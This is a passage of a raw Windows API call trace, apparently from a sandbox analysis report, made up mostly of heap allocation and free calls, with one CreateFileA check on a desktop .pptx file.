dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0161.999] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0161.999] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0162.000] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0162.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0162.000] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0162.000] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0162.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0162.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0162.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0162.001] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0162.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0162.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0162.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0162.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0162.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0162.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0162.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0162.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0162.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0162.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0162.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0162.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0162.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0162.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0162.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0162.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0162.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0162.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0162.001] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0162.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0162.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0162.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0162.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0162.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0162.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0162.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0162.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0162.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0162.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0162.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0162.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0162.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0162.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0162.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0162.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0162.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0162.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0162.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0162.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0162.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0162.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0162.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0162.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0162.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0162.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0162.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0162.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0162.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0162.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0162.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0162.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0162.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0162.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0162.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0162.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0162.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0162.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0162.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0162.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0162.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0162.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0162.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0162.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0162.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0162.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0162.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0162.004] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0162.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0162.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0162.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0162.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0162.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0162.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0162.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0162.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0162.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0162.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0162.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0162.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0162.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0162.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0162.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0162.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0162.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0162.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0162.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0162.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0162.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0162.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0162.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0162.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0162.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0162.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0162.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0162.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0162.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0162.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0162.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0162.005] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0162.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0162.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0162.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0162.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9c70 [0162.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9c70, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0162.006] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j-lwl.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0162.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0162.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0162.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0162.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0162.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0162.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0162.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0162.008] FreeLibrary (hLibModule=0x75990000) returned 1 [0162.008] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0162.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0162.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0162.008] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0162.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0162.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0162.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0162.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0162.008] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0162.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0162.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0162.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0162.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0162.009] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0162.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0162.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0162.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0162.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd720 [0162.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd720, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0162.009] FreeLibrary (hLibModule=0x75990000) returned 1 [0162.009] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0162.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0162.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0162.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0162.010] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 